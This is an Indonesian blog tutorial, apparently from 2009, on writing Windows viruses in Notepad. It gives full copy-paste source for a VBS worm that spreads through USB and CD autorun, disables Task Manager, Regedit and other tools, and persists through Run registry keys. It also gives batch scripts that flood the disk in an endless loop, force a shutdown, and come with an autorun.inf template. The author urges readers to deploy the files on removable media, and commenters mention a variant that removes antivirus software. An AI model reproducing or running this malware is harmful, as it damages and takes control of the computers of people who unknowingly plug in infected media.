Home > TIPS & TRICK, Virus > Beberapa Cara Membuat Virus Dengan Notepad Script VBS & Bat

Beberapa Cara Membuat Virus Dengan Notepad Script VBS & Bat

Karena di Windows sudah ada compiler yang
terintegrasi dengannya, Windows Based Script Host.
sesua janji saya, kita akan membuat virus yang sederhana
menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke Removable Disc
dengan AutoRun sehingga komputer lain yang tercolok Flash Disc atau CD
terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan
infector-nya.
Buka notepad, Lalu Copy Paste Code Script di Bawah ini Yaw…. dan simpan dengan
ekstensi bat (klo yang disuruh bat) atau ekstensi vbs (Klo yang disuruh vbs),
misalnya virus.bat/virus.vbs

PEMBUATAN VIRUS DENGAN EKSTENSI .VBS
======================================================================================
‘//-ifank
ITS-//
‘//-INI VIRUS BERBAHAYA JANGAN DIBUAT MAIN-MAIN!!!!!!!-//
‘//-Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian
lanjutkan kegiatan virus-//
on error resume next
‘//-Dim kata-kata berikut ini-//
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
‘//-Set sebuah teks yang nantinya akan dibuat untuk
Autorun Setup Information-//
atr = “[autorun]”&vbcrlf&”shellexecute=wscript.exe ifank.exe.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
‘//-Copy diri untuk menjadi file induk di Windows Path
(example: C:\Windows)-//
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\ifank.exe.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\ifank.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\ifank.exe.vbs”)
tf.attributes = 39
‘//-Buat Atorun.inf untuk menjalankan virus otomatis
setiap flash disc tercolok-//
‘//-Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket-//
for each flashdrive in fs.drives
‘//-Cek Drive-//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path
“A:” then
‘//-Buat Infector jika ternyata Drivetypr 1 atau 2. Atau
A:\-//
set tf=fs.getfile(flashdrive.path &”\ifank.exe.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\ifank.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\kamelia.exe.vbs”)
tf.attributes =39
‘//-Buat Atorun.inf yang teks-nya tadi sudah disiapkan
(Auto Setup Information)-//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//-Manipulasi Registry-//
set rg = createobject(“WScript.Shell”)
‘//-Manip – Ubah Title Internet Explorer menjadi
BOSGENTONGS v.s. ANTIVIRUS-//
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window
Title”,” THE IFANK v.s. ANTIVIRUS “
‘//-Manip – Set agar file hidden tidak ditampilkan di
Explorer-//
rg.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,
“0”, “REG_DWORD”
‘//-Manip – Hilangkan menu Find, Folder Options, Run, dan
memblokir Regedit dan Task Manager-//
rg.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”,
“1”, “REG_DWORD”
rg.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”,
“1”, “REG_DWORD”
rg.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”,
“1”, “REG_DWORD”
rg.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”,
“1”, “REG_DWORD”
rg.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”,
“1”, “REG_DWORD”
‘//-Manip – Disable klik kanan-//
rg.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”,
“1”, “REG_DWORD”
‘//-Manip – Munculkan Pesan Setiap Windows Startup-//
rg.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”,
“Worm Kalong. Variant from Ifank, don’t panic all data are safe.”
rg.regwrite “”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “AKU TELAH MENGUASAI YOUR
SISTEM!!! MAKA BERDOALAH AGAR TIDAK TERJADI”
‘//-Manip – Aktif setiap Windows Startup-//
rg.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”,
winpath & “\batch- ifank.exe.vbs “
‘//-Manip – Ubah RegisteredOwner dan Organization-//
rg.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredOrganization”, “The Ifank”
rg.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\RegisteredOwner”,”bosgentongs”
‘//-Manip – Membuat Cadangan di sistem svchost, MS32Dll
dan membuat ikon-//
rg.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\ifank.exe.vbs”
rg.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,””
rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
‘//-Manip – Me-Log off komputer setelah log on BOLEH
DIHAPUS KLO MAU LIHAT EFEKNYA!!!-//
rg.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Logoff”,
winpath & “\System32\Logoff.exe”
‘//-Fungsi di untuk mengaktifkan kembali script dan
mengulangnya kembali-//
if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
do while year(now) >= 2009
WScript.sleep 20000
‘//-Memunculkan pesan window terus menerus-//
msgbox “Selamatlah virus ini tiba di sistem kamu” & vbcrlf & _
“kulo nyuwun pangapuranipun menawi sampung mengganggu ente sekalian” & vbcrlf &
_
“jangan kawatir dan sedih, aku tidak akan kuasai komputer bobrok ini. kini ente
sudah masuk dalam permainanku” & vbcrlf & _
“ini hanya permainnaku yang aku kesepian di sini” & vbcrlf & _
vbcrlf & vbcrlf & _
” elok-elok indah kehidupan bukan kenyataan” & vbcrlf & vbcrlf & _
” saatnya kini aku bangkit dalam mimpi ituk”
‘//-Mengulang kode script-//
loop
‘//Akhir dari Kode & simpan dengan nama
ifank.vbs-//
==========================================================================================
PEMBUATAN VIRUS DENGAN EKSTENSI .BAT
==========================================================================================
cd C:\
mkdir\Alert\Warning\Dangers\A NAMAKU IFANK ANAK TANGERANG OKE SEDANG SEDIH
MENCARI TEMAN\Makan
cd C:\Windows\
mkdir\Alert\Warning\Dangers\A NAMAKU IFANK ANAK TANGERANG SEDANG SEDIH
MENCARI TEMAN\Makan
cd C:\Windows\System32\
mkdir\Alert\Warning\Dangers\A NAMAKU IFANK ANAK TANGERANG OKE SEDANG SEDIH
MENCARI TEMAN\Makan
cd D:\
mkdir\Alert\Warning\Dangers\A NAMAKU IFANK ANAK TANGERANG OKE SEDANG SEDIH
MENCARI TEMAN\Makan
@echo off
copy bosgentongsvirus.bmp %systemdrive%\ /y
copy bosgentongsvirus.bmp %systemdrive%\WINDOWS\ /y
copy bosgentongsvirus.bmp %systemdrive%\WINDOWS\system32\ /y
copy bosgentongsvirus.exe %systemdrive%\ /y
copy bosgentongsvirus.exe %systemdrive%\WINDOWS\ /y
copy bosgentongsvirus.exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM
BOSGENTONGS” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “AKU TELAH MENGUASAI YOUR
SISTEM!!! MAKA BERDOALAH AGAR TIDAK TERJADI” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v
ifank /d %systemdrive%\windows\system32\ifank.exe /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d
%systemdrive%\WINDOWS\system32\ifank.bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_CURRENT_USER\Control Panel\Colors” /v window /d #C10000 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d
%systemdrive%\WINDOWS\system32\ifank.bmp /f
:bgvirus
echo>>Ifank.reg
echo>>Anak.chm
echo>>Tangerang.dll
echo>>Oke.htt
cls
goto bgvirus
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo ——————-
echo =============IFANK love HACKER ==============
echo ============= ifank inc. Team ==============
echo ============= Tangerang, 15 Agustus 2009 ==============
echo ——————-
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
echo …
echo AWAS JANGAN PENCET TOMBOL APAPUN!
echo Atau memori anda akan penuh
echo …
echo Mendeteksi apabila tombol keyboard dipencet …….
Pause>null
:bgvirus
echo>>ifank.reg
echoTangerang.dll
echo>>Oke.htt
echo>>Yes.txt
cls
goto bgvirus
‘//-Simpan dengan ekstensi *.bat-//

=========================================================================================
Atau Virus Bat yang ini….
=========================================================================================
@echo off
C:
cls
Echo Do you want to kill all program’s? (Y/N)
pause >nul
cls
Echo Are you sure want to delete all data? (Y/N)
pause >nul
cls
Echo Deleting All Data
ping localhost -n 2 >nul
cls
Echo Deleting All Data.
ping localhost -n 2 >nul
cls
Echo Deleting All Data..
ping localhost -n 2 >nul
cls
Echo Deleting All Data…
cls
Echo Deleting All Data….
ping localhost -n 2 >nul
cls
Echo Deleting All Data.
ping localhost -n 2 >nul
cls
Echo Deleting All Data..
ping localhost -n 2 >nul
cls
Echo Deleting All Data…
ping localhost -n 2 >nul
cls
Echo Deleting All Data….
ping localhost -n 2 >nul
cls
Echo System Error
Echo System can’t open windows Folder
Echo Warning! Sistem shutting down
ping localhost -n 2 >nul
cls
dir /s
shutdown -s -t 25 -c “This is a virus. You have been
Hakced By Ifank. Thank you for your attention”
:hack
echo You have just been hacked
goto hack
‘//- simpan dengan ekstensi*.bat-//
==========================================================================================
KETERANGAN
Warna Merah artinya
Tidak Usah Ditulis Karena hanya Sebagai Petunjuk Saja
Warna Biru Artinya
Tulisan ini Bisa Diganti Degan Tulisan Sembarang Terserah Kamu
Anda dapat berimprovisasi dengan menambahkan sebuah file autorun.inf file
untuk
menjalankan program tersebut ketika seseorang melakukan klik ganda pada sebuah
drive. Untuk membuat auturun buka notepad copy-paste code di bawah dan simpan
dengan file name: Autorun.inf dengan save as type: All files Saya
Beri kode autorun.inf Bila Belum Tau: NB: Warna biru
adalah nama file virus+ekstensinya yang kamu buat tadi
======================================================================
[Autorun]
UseAutoplay=1
Icon=%SystemRoot%\system32\SHELL32.dll,7
Shellexecute=wscript.exe ifank.exe.vbs
Shell\OPEN\COMMAND=wscript.exeifank.exe.vbs
Shell\explore\COMMAND=wscript.exe ifank.exe.vbs
Action=Open folder to view files
=====================================================================
NB: file-file tersebut harus dalam 1 direktori, lalu seleksi
file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY.
Copy file-file tersebut ke CD atau FlashDisk dalam Folder Utama Yaw
Truz Nikmatin Dech Efeknya….

Penulis tidak bertanggung jawab atas segala
kerusakan yang ditimbulkan, penulis hanya membuat artikel ini bertujuan untuk
Pengetahuan, Wawasan dan Pendidikan saja.

SELAMAT MENCOBA.

Categories: TIPS & TRICK, Virus
  1. indragp2009
    15 August 2009 at 02:48

    woew boleh juga nehh….. trims infonya

  2. lawliet90
    15 August 2009 at 02:52

    manstab om….😀

  3. Ifank_Funky
    15 August 2009 at 02:59

    Sama-sama tapi jangan buat jail yaaaa…kasihan kalo yang kena virus ini.

  4. Anonim
    18 July 2012 at 11:37

    Gue Punya Varian yang bisa ngapus AV SmadAV

  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: